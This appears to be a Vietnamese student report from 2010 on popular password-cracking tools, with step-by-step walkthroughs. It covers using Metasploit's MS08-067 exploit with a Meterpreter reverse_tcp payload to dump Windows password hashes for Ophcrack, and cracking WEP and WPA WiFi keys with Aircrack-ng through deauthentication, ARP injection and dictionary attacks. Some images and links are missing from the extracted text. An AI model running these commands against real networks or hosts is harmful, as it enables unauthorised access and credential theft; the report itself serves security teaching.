Tải bản đầy đủ (.docx) (77 trang)

Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất pdf

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (2.85 MB, 77 trang )

BỘ GIÁO DỤC VÀ ĐÀO TẠO
TRƯỜNG ĐẠI HỌC MỞ TPHCM
KHOA CÔNG NGHỆ THÔNG TIN

Giáo Viên Hướng Dẫn : T.S Đào Thế Long
Sinh viên: 1. Phan Công Lâm, Mssv:09H1012053
2.Nguyễn Thúc Toàn,Mssv:09H1012110
3.Nguyễn Huy Tưởng,Mssv:09H1012125
10, tháng 11, năm 2010
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 1
Ophcrack là phần mềm khôi phục mật khẩu Windows miễn phí tốt nhất hiện nay.Đối với người
được trang bị những hiểu biết cơ bản về hệ điều hành mà lần đầu tiên muốn khôi phục mật
khẩu thì Ophcrack quả là một công cụ rất nhanh và dễ dàng sử dụng.
Để sử dụng Ophcrack, bạn không cần phải truy cập vào Windows để phục hồi mật khẩu đã
mất.Ophcrack cung cấp cho bạn file ISO miễn phí và bạn có thể ghi ra đĩa CD rồi khởi chạy đĩa
CD đó. Khi chương trình Ophcrack đã chạy, bạn xác định vị trí tài khoản người dùng Windows
và thực hiện quá trình khôi phục mật khẩu. Tất cả các bước thực hiện hoàn toàn là tự động.
1. Cài đặt OPHCRACK
Việc cài đặt Ophcrack tương đối dễ, tuy nhiên có phần lựa chọn các thành phần cài đặt cần lưu
ý –Hình 1.
Hình 1: Chọn các compornents để cài đặt vào mục tables cho ophcrack
Trên Hình 1, nếu đã download, có thể lựa chọn một số lựa chọn sau:
- Continue without install the table: Cài đặt chỉ có chương trình Ophcrack, khôngcó
Rainbow Table.
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 2
- Download alphanumenic table from Internet (388MB-SSTI04-10K): cài đặt và download
Rainbow Table loại SSTI04-10K.
- Download alphanumenic table from Internet (733MB-SSTI04-5K): cài đặt và download
Rainbow Table loại SSTI04-5K.
- Install alphanumenic table from CD or DVD (388MB-SSTI04-10K): cài đặt Ophcrack và sử
dụng Rainbow Table loại SSTI04-10K từ CD hoặc DVD.


- Install alphanumenic table from CD or DVD (733MB-SSTI04-5K): cài đặt Ophcrack và sử dụng
Rainbow Table loại SSTI04-5K từ CD hoặc DVD.
Rainbow Table loại SSTI04-5K có kích thước 733MB được dùng cho các máy tính có RAM từ
512MB trở lên. Rainbow Table loại SSTI04-10K có kích thước 388MB được dùng cho các máy
tính ít RAM hơn.
Nếu trong trường hợp bạn download riêng đĩa LiveCD, hoặc download các Rainbow Table theo
link dưới đây, thì lựa chọn Continue without install the table.
Code:
Rainbow Table loại SSTI04-10K (388MB) Rainbow
Table loại SSTI04-5K (733MB) />Sau khi cài đặt, chạy chương trình, giao diện của Ophcrack như Hình 2.
Hình 2: Giao diện Ophcrack trên Windows
Trên hình 2, trước khi sử dụng, click vào nút Tables để chọn đường dẫn đến bảng Rainbow
Table – hình 3.
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 3
Hình 3: Select ophcrack table.
Trên Hình 3, mở đến đĩa LiveCD, mục slax\ophcrack\tables, sau đó nhắp OK.
2. Kết hợp metasploit với ophcrack crack password window winxp sp2.
Trong ví dụ này chúng ta sẽ dùng backtrack 4, trong đĩa backtrack này có tích hợp sẵn
metasploit và ophcrack. Sau đây là các bước để thực hiện các bước crack một password của
window xp sp2.
ở đây ta sẽ lợi dụng lỗi bảo mật “Microsoft Security Bulletin MS08-067 của Microsoft cho
Windows Server Service” để khai thác thông tin. Đây là lỗ hổng nghiêm trọng nằm trong dịch
vụ Server Service RPC của hệ điều hành Windows.Với lỗi này, Hacker hoàn toàn có thể điều
khiển máy tính từ xa với quyền cao nhất của hệ thống.
Mức độ nguy hiểm: Rất cao.
Mô tả kỹ thuật
Server Service là dịch vụ cho phép máy tính cài đặt hệ điều hành Windows có thể chia sẻ file,
máy in,… qua mạng và là dịch vụ không thể thiếu của hệ điều hành. Dịch vụ này hỗ trợ giao
thức RPC, trong đó có một chức năng tiếp nhận và xử lý một yêu cầu muốn chuyển đổi đường
dẫn (vídụ \\C\Program Files\ \Windows) về định dạng đường dẫn Canonicalization

(\\C\Windows). Tuy nhiên, quá trình xử lý này đã không kiểm soát độ dài của đường dẫn trong
yêu cầu và xảy ra lỗi tràn bộ đệm.
Như vậy, với việc thực hiện một yêu cầu RPC với đường dẫn có độ dài “quá khổ”, Hacker dễ
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 4
dàng thực thi mã độc trên các máy tính từ xa nhằm chiếm quyền điều khiển, cài đặt virus, ăn
cắp thông tin…
Các bước thực hiện
Bước 1: Khi chúng ta khởi động backtrack. Chúng ta mở một console và gõ lệnh theo cú pháp
sau để chạy metasploit.
Theo như tấm hình này ta sẽ sử dụng metasploit phiên bản 3.
Bước2: ta gõ cú pháp : “use exploit/windows/smb/ms08_067_netapi” để sử dụng lỗi bảo mật
này.
Bước3 : ở bước này ta sẽ thực hiện các lệnh để cấu hình các thuộc tính để chuẩn bị cho cuộc
tấn công chiếm quyền điều khiển.
Cú pháp :
set payload windows/meterpreter/reverse_tcp //Meta-Interpreter là một advanced
payload. Muc đích của nó là để cung cấp những tập lệnh để khai thác, tấn công các máy
remote computers.Nó được viết từ các developers dưới dạng shared object( DLL) files.
Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn toàn không được ghi
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 5
lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống virus
Meterpreter cung cấp một tập lệnh để chúng ta có thể khai thác trên các remote computers.
set RHOST 192.168.1.1 // đây là địa chỉ ip của máy victim.
set LHOST 192.168.1.2 // đây là địa chỉ ip của máy tấn công.
Khi đã chuẩn bị xong các cấu hình ta sẽ có một bảng với các thong số như hình trên.
Bước4: ở bước này ta sẽ tiến hành khai thác lỗi.
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 6
Bước5 : Khi đã vào được máy victim. Ta dung lệnhh ashdump để hash files an trong window
xp.
Bước6 :Ở bước thứ 5 ta đã hash dump được file sam trong win. Ta sẽ copy đoạn hash dump

đó vào trong file text. Và lưu lại.
Bước7 :ta khởi động chương trình ophcrack GUI và tiến hành crack mật khẩu. Ta sẽ load file
hash đã được tạo từ bước 6 vàovà nhấn nút crack. Và đợi chờ kết quả của chương trình trả về.
Lưu ý :Khi sử dụng ophcrack chúng ta phải có bộ directories của rainbow table. Chúng ta có thể
download các tables đó ở đây.
Link download : />Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 7
Dưới đây là các hình ảnh dung phần mềm ophcrack để crack file hash.
Hình1 : load file hash đã copy được
Hình2 :Nhấn nút crack để bắt đầu crack mật khẩu file hash
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 8
Hình3 :Khi chạy xong chúng ta sẽ thấy password đã được crack hiển thị ở cột NT Pwd.
I.Giới Thiệu Về Wireless Lan(wlan),WEP,WPA
• WLAN là một loại mạng máy tính nhưng việc kết nối giữa các thành phần trong
mạng không sử dụng các loại cáp như một mạng thông thường, môi trường
truyền thông của các thành phần trong mạng là không khí. Các thành phần trong
mạng sử dụng sóng điện từ để truyền thông với nhau.Institute of Electrical and
Electronics Engineers(IEEE) đã phê chuẩn sự ra đời của chuẩn 802.11, với tên
gọi WIFI (Wireless Fidelity) cho các mạng WLAN.Là một bộ giao thức cho thiết bị
không dây dựa trên chuẩn 802.11a/b/g bao gồm các Access Point và các thiết bị
đầu cuối không dây như pc card, usb card, wifi PDA… kết nối với nhau. Wifi hiện
nay có 3 kiểu mã hoá chính gồm: WEP-Wired Equivalent Privacy , WPA-Wireless
Protected Access và WPA2.
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 9
• WEP (Wired Equivalent Privacy) là một hệ thống dùng để mã hóa, giải mã
dữ liệu và bảo mật dữ liệu cho mạng Wireless, WEP là một phần của chuẩn
802.11 gốc dựa trên thuật toán mã hóa RC4, mã hóa dữ liệu 40bit để ngăn chặn
sự truy cập trái phép từ bên ngoài.
• WPA (Wi-fi Protected Access) được thiết kế nhằm thay thế cho WEP vì có
tính bảo mật cao hơn. Temporal Key Intergrity Protocol (**IP), còn được gọi là
WPA key hashing là một sự cải tiến dựa trên WEP, là vì nó tự động thay đổi

khóa, điều này gây khó khăn rất nhiều cho các Attacker dò thấy khóa của
mạng.Mặt khác WPA cũng cải tiến cả phương thức chứng thực và mã hóa. WPA
bảo mật mạnh hơn WEP rất nhiều.
II.Aircrack-ng:
II.1-Giới thiệu Aircrack-ng:
Hầu như hiện nay khi nhắc tới Crack password Wireless thì chúng ta nghĩ ngay đến
chương trình Aircrack. Aircrack là chương trình crack password wireless rất mạnh, một
công cụ bẻ khóa WEP/WPA nhanh nhất,chạy được trên Windows và Linux.
Aircrack hỗ trợ các chuẩn không giây 802.11a/b/g dùng để Crack WEP và WPA-PSK. Nó
có thể giải mã các mã hóa WEP sử dụng key có chiều dài từ 40 tới 512-bits và đủ cho
giải mã hầu hết các gói tin trên mạng Wireless. Công cụ này còn hỗ trợ để bẻ khóa
WPA1 và WPA2 bằng phương thức Brute Force Attack. Ngoài ra với airdecap chúng có
khả năng giải mã các file được mã hóa bởi WEP và WPA.
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 10
II.2 Aircrack-ng hỗ trợ việc lựa chọn card wireless thích
hợp:
Tên Card Loại Chipset
Antenn
a
Windows
hỗ trợ
Linux
hỗ trợ
Airlink AWLC4030 CardBus Atheros Nội bộ airodump-ng Có
Belkin F5D7010ed CardBus Atheros Nội bộ Có
Belkin F5D8071 ExpressCard Atheros Nội bộ Có
D-Link DWA-643 ExpressCard Atheros Nội bộ
Chưa xác
nhận


D-Link DWL-650 PCMCIA
Prism
2,5
Nội bộ airodump-ng Có
D-Link DWL-G630 C2 v3.01 CardBus Atheros Nội bộ airodump-ng Có
D-Link DWL-G630 E1 Ralink Atheros Nội bộ Airodump-ng Có
D-Link DWL-G650 CardBus Atheros Nội bộ Airodump-ng Có
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 11
C3 , C4 , B5 C3, C4, B5
Linksys WPC55AG
v1.2 v1.2
CardBus Atheros Nội bộ có Có
MSI CB54G2 CardBus Ralink Nội bộ Không Có
Netgear WAG511 CardBus Atheros Nội bộ Airodump-ng có
Netgear WG511T CardBus Atheros Nội bộ Airodump-ng có
Netgear WG511U CardBus Atheros Nội bộ Airodump-ng có
Proxim 8470-WD CardBus Atheros MMCX không có
Senao NL-2511
CD PLUS EXT CD PLUS
EXT
PCMCIA
Prism
2,5
MMCX không có
SMC SMCWCBT-G CardBus Atheros Nội bộ Airodump-ng có
TP-Link TL-WN610G CardBus Atheros
Nội bộ
Airodump-ng có
TRENDnet TEW-441PC CardBus Atheros Nội bộ Airodump-ng có
Ubiquiti SRC CardBus Atheros MMCX Airodump-ng có

Khuyến cáo ta nên dùng card Atheros chipset.
II.2-Một số điều cần biết khi Crack Password:
1. Card mạng của bạn không chuyển về chế độ monitor được – hãy xem danh sách card được
hỗ trợ trên trang trên.
2. Chỉ có thể dò được khóa WPA/WPA2-PSK3. Change mac address có thể sẽ gặp lỗi không
authentication được.
4. Sự im lặng của router: nếu trong mạng của AP không có máy con kết nối thì ta sẽ nhanh
chóng nhận ra là mình không hề bắt được một gói tin ARP nào hết. Lý do là các AP đời sau này
đã được harderning, chúng rất yên lặng, khó mà cạy ra được một gói tin ARP nào. Giải pháp:là
hãy thử crack nó vào một thời gian khác hoặc dùng mdk3 để cố gắng reset AP, khi AP khởi
động lại, nó sẽ quăng ra một ít gói tin ARP, dùng koreK hoặc fragment để crack chúng thôi
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 12
5.Khi bạn dùng Aireplay mà thấy gói tin gởi đi nhưng không có trả lời (ACK) thì mình phải
chuyển sang STATION khác và áp dụng tương tự.
6.Dùng lệnh aireplay-ng mà thấy data tăng lên thì mới được chứ data mà đứng yên thì thua rồi.
7. Khi không thể chứng thực với AP thì có nhiều nguyên nhân, sai kênh, sai MAC AP(BSSID),
quá xa, không có Client nào đang kết nối với AP.
II.3- Tiến Trình Chi Tiết Để Crack Password.
1. Xem interface của card mạng
_iwcofig
hoặc _
_ifcofig
để xem có những card mạng nào trong máy, thường là eth0 và
wlan0(chúng ta sẽ dùng wlan0)
2. Chuyển wlan0 về chế độ nghe ngóng
_airmon-ng wlan0 start
. Lệnh này sẽ tạo ra một card wireless ảo là
mon0
3. Scan mạng wireless trong vùng bắt sóng.
_

airodump-ng wlan0(mon0)
để bắt sóng wifi.
4. Tiến hành bắt gói tin
_airodump-ng channel [AP channel] bssid [MAC AP ] write capturefile wlan0
bắt gói tin của AP trên kênh nào đó với cái BSSID là MAC của AP và ghi ra một tên file .
5. Tiến hành bắt tay với AP để tạo ra dòng tín hiệu.
_
aireplay-ng -1 0 -a <MAC AP> -c <MAC Client đang kết nối> wlan0
Trong cơ chế bảo mật WPA, khi muốn kết nối với AP thì Client cần phải gởi gói tin chứa 4-way
handshake đến AP, trong gói tin đó chứa password(đã được hash) của mạng. Để được
password ta phải có gói tin trên.
Lưu ý: aireplay-ng -1 0: gởi tin tới AP tới bao giờ được chứng thực
Ý nghĩa của lệnh này là AP sẽ thông báo Client đã bị đá ra khỏi mạng và client sẽ phải gửi gói
tin chứa 4-way handshake để yêu cầu kết nối lại. Khi đó máy của hacker ta sẽ bắt được gói tin
6.Tạo cơ sở dữ liệu
Dùng lệnh theo thứ tự:
_airolib-ng crackwpa import essid essid.txt
để tạo CSDL tên là crackwpa và import cái tên AP vào trong cái file essid.txt mình đã tạo sẵn.
-
airolib-ng crackwpa import passwd /đường dẫn tới file password.lst
-
airolib-ng crackwpa batch
: Kết hợp essid với password
-
airolib-ng crackwpa stats
: kiểm tra tính hợp lệ
Mục đích phần này là ta sẽ so sánh password với cái CSDL có trong Backtrack, vì thực chất việc

Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 13
password là so sánh gói tin với list pass có sẵn trong máy

7.Crack capture file, tìm khoá password wep,wpa.
_aircrack-ng -b [AP BSSID] [capture file(s) name]
_aircrack-ng -r crackwpa wpa*.cap
Aircrack sẽ bắt đầu lục lọi trong số những gói dữ liệu đã bắt được để tìm ra khóa WEP.
III.Crack Password Wireless WEP Bằng Aircrack
1.Chuẩn bị :
1.1.Phần cứng :
_ 1 AP có hỗ trợ bảo mật WEP
_ 1 PC có wireless card kết nối với AP-> Client
_ 1 PC có wireless card là Atheros có hỗ trợ monitor và chế độ injection(chèn gói tin)->
Attacker
1.2.Phần mềm :
PC của Attacker :
_ HĐH Linux (mình sẽ dùng BackTrack 4)
_ HĐH Windows
_ Aircrack-ng
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 14
2. Crack Password Wireless WEP Bằng Aircrack
2.1.Các bước cơ bản :
_ Bước 1 : chuyển wireless card về chế độ monitor
_ Bước 2 : scan mạng wireless và bắt dữ liệu từ AP target
_ Bước 3 : bơm gói ARP để tăng lưu lượng dữ liệu bắt được
_ Bước 4 : sau khi bắt đủ gói dữ liệu , dùng aircrack-ng dò password
2.2.Thực hiện crack WEP:
Bước 1 :
Xem các interface của card mạng :
Trường hợp này wireless card có interface là wlan0
Chuyển wlan0 về chế độ Monitor
airmon-ng sẽ tạo ra card mạng ảo dùng cho việc Monitor tên là mon0
Bước 2 :

Scan mạng wireless trong “vùng bắt sóng” của wireless card
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 15
Trong “vùng bắt sóng” của wireless card có 2 AP có WEP , 1 AP là SSID là Diep , 1 AP là quang1
(AP này có Power là -1 tức là mạng ad-hoc)
(ngoài ra còn có 1 AP mà cột ESSID ghi là <length: 7> tức là AP ẩn , Hidden SSID)
AP mà ta quan tâm là Diep có BSSID (MAC Address) 00:14:6C:06:D7:96 , ESSID (tên
định danh của mạng) Diep , Channel là 11, và đang có 2 client kết nối .
(tắt process airodump-ng mon0 đi)
Em xin giải thích một số thông số chính:
• BSSID: địa chỉ Mac của AP cần hack, có bao nhiêu AP sẽ được liệt kê hết ở đây.
• PWR: là power ,chỉ độ mạnh yếu của mạng, power = -1 đó là mạng adhoc.
• Beacons: là các mốc kết nối
• #Data: số data luân chuyển trong mạng. Dữ liệu càng cao càng tốt.
• #/s : là số lượng packet chuyển trong mạng trong 1 s.Tốc độ kết nối càng cao càng tốt.
• CH là channel (Kênh kết nối), một thông số quan trọng trong việc crack khóa.
• Thông số MB là chuẩn của AP: 11 MB là chuẩn b, 54 MB là chuẩn g.
• ESSID là tên của mạng(AP), nếu AP đang ẩn tên thì nó sẽ có dạng <length:x>.
• ENC : Bảo mật theo giao thức nào đó WEP, WPA, WPA2,
• CIPHER: Mã hóa theo kiểu nào đó CCMP, WEP,
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 16
• AUTH: Chứng thực theo kiểu nào đó PSK, TKIP,
• STATION: MAC của Client đang kết nối tới AP.
Ta sẽ bắt dữ liệu từ AP Diep
-c 11 : channel của AP
-w wep : dữ liệu bắt được sẽ lưu vào file wep.cap (4 file wep* sẽ được tạo ra , xem hình bên
dưới)
-d 00:14:6C:06:D7:96 : BSSID của AP
mon0 : interface ảo của wireless card dùng cho việc monitor
=> lệnh này có nghĩa là : mon0 sẽ bắt các gói dữ liệu đi qua AP có MAC là 00:14:6C:06:D7:96
trên kênh 11 và ghi vào file wep.cap

Những Client có PoWeR -1 là những client “bất hoạt” hoặc “ngoài vùng bắt sóng” của wireless
card , ta chỉ cần quan tâm đến client có BSSID là 00:13:E8:BE:E9:C5.
Bước 3 :
Theo lý thuyết , muốn dò ra password của AP thì phải cần ít nhất khoảng 200.000 gói dữ
liệu (tức là cột #data phải đạt đến con số 200.000) , nhưng trên thực tế thì khi data đạt đến
20.000-50.000 là có thể dò ra password.
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 17
Nếu cứ để lệnh airodump-ng bắt dữ liệu không thôi thì có khi đợi cả ngày vẫn chưa có 20.000
gói dữ liệu , do đó ta phải bắt và “bơm” các gói ARP để tăng lưu lượng dữ liệu qua lại
aireplay-ng -3 : standard ARP-request replay
-x 1000 : “bơm” 1000 gói mỗi giây (max là 1024 gói, mặc định là 500)
-b 00:14:6C:06:D7:96 : MAC address, Access Point
-h 00:13:E8:BE:E9:C5 : set Source MAC address , tức là MAC của client
mon0 : interface ảo của wireless card dùng cho việc monitor
=> lệnh này có nghĩa là : mon0 sẽ giả client 00:13:E8:BE:E9:C5 để “bơm” ARP vào AP
00:14:6C:06:D7:96, mỗi giây 1000 gói.
Các gói ARP được tạo ra khi client có yêu cầu kết nối với AP , vì vậy ta phải “đá” client ra :
aireplay-ng -0 1 : deauthenticate 1 lần
-a 00:14:6C:06:D7:96 : set Access Point MAC address
-c 00:13:E8:BE:E9:C5: set Destination MAC address
mon0 : interface ảo của wireless card dùng cho việc monitor
=> lệnh này có nghĩa là : mon0 sẽ giả danh AP 00:14:6C:06:D7:96 và gởi đến client
00:13:E8:BE:E9:C5 thông tin rằng “anh đã bị đá ra khỏi mạng” , client sẽ phải gởi gói ARP
yêu cầu kết nối lại với AP. Lúc này lệnh aireplay-ng -3 ở trên sẽ bắt được gói ARP và “bơm” nó
vào AP
Quay lại cửa sổ của lệnh airodump-ng và aireplay-ng ta sẽ thấy cột #Data tăng lên rất nhanh
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 18
Bước 4 :
Đến khi cột #Data được trên 20.000 gói thì ta bắt đầu dò password từ file .cap (được tạo ra ở
bước 2) bằng lệnh aircrack-ng

Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 19
Password dò được là 0987177185 (sau khi đã lọc ra các dấu “ : “ )
IV.Crack Password Wireless WPA Bằng Aircrack
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 20
IV.1-Chuẩn bị :
a).Phần cứng :
_ 1 AP có hỗ trợ bảo mật WPA
_ 1 PC có wireless card kết nối với AP-> Client
_ 1 PC có wireless card là Atheros có hỗ trợ monitor và chế độ injection(chèn gói tin)->
Attacker
b).Phần mềm :
PC của Attacker :
_ HĐH Linux (ở đây sẽ là BackTrack 4)
_ HĐH Windows
_ Aircrack-ng
_ 1 file từ điển chứa các từ khóa có khả năng là password , hoặc 1 pre-computed database
(dùng airolib-ng để tạo)
IV.2. Crack Password Wireless WPA Bằng Aircrack
IV.2.1.Các bước cơ bản :
_ Bước 1 : chuyển wireless card về chế độ monitor
_ Bước 2 : scan mạng wireless và bắt dữ liệu từ AP target
_ Bước 3 : bắt 4-way handshake
_ Bước 4 : dùng aircrack-ng + file từ điển (hoặc pre-computed database) để dò password
IV.2.2.Thực hiện Crack Password Wireless WPA:
Bước 1 :
Xem các interface của card mạng :
Trường hợp này wireless card có interface là wlan0
Chuyển wlan0 về chế độ Monitor
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 21
airmon-ng sẽ tạo ra card mạng ảo dùng cho việc Monitor tên là mon0

Bước 2:
Scan mạng wireless trong “vùng bắt sóng” của wireless card
Ở đây ta có 1 AP có BSSID là 00:13:D4:68:D2:08 , channel 7 , bảo mật WPA2 , mã hóa
kiểu CCMP , chứng thực PSK , cột ESSID ghi là <length: 7> tức là AP ẩn ,
và có 1 client 00:13:E8:BE:E9:C5 đang connect
Ta sẽ bắt dữ liệu từ AP ẩn có BSSID 00:13:D4: 68: D2:08 trên channel 7 và ghi vào file
wpa2.cap
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 22
Bước 3 :
Trong cơ chế bảo mật WPA, khi muốn kết nối với AP, client sẽ gởi gói tin có chứa 4-way
handshake đến đến AP, trong gói tin đó có chứa thông tin về password (đã được hash) của
mạng WPA . Ta phải được gói tin có chứa 4-way handshake thì mới có thể tìm ra được
password.
Để làm được điều này , ta phải “đá” client ra :
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 23
aireplay-ng -0 1 : deauthenticate 1 lần
-a 00:13:D4:68:D2:08 : set Access Point MAC address
-c 00:16:44:7B:F9:BC : set Destination MAC address
mon0 : interface ảo của wireless card dùng cho việc monitor
=> lệnh này có nghĩa là : mon0 sẽ giả danh AP 00:13:D4:68:D2:08 và gởi đến client
00:16:44 :7B:F9:BC thông tin rằng “anh đã bị đá ra khỏi mạng” , client sẽ phải gởi gói tin
chứa 4-way handshake yêu cầu kết nối lại với AP. Lúc này lệnh airodump-ng ở trên sẽ bắt được
gói tin chứa 4-way handshake , và cũng sẽ dò ra được SSID của AP .
(quay lại cửa sổ airodump-ng)
Bước 4 :
Công việc cần làm bây giờ là phải dò ra password từ gói dữ liệu chứa 4-way handshake mà ta
bắt được (đã lưu vào file .cap)
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 24
Ta chỉ quan tâm đến 3 file :
_ database : file pre-computed database , chứa các từ khóa đã được hash (ở dạng binary) cho

phù hợp với các SSID cụ thể .
_ dic : file từ điển , chứa các từ khóa (ở dạng text) có thể là password của AP
_ wpa2-01.cap : file chứa 4-way handshake,được tạo ra bởi lệnh airodump-ng ở bước 2 + 3
Chúng tôi đã có :
+ file từ điển dung lượng ~ 40MB chưa ~ 3 triệu từ khóa
+ file database được tạo nên từ file từ điển trên , tương thích với SSID là default
Bắt đầu dùng aircrack-ng kết hợp với file từ điển đề dò password bắt được trong file .cap :
Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 25

×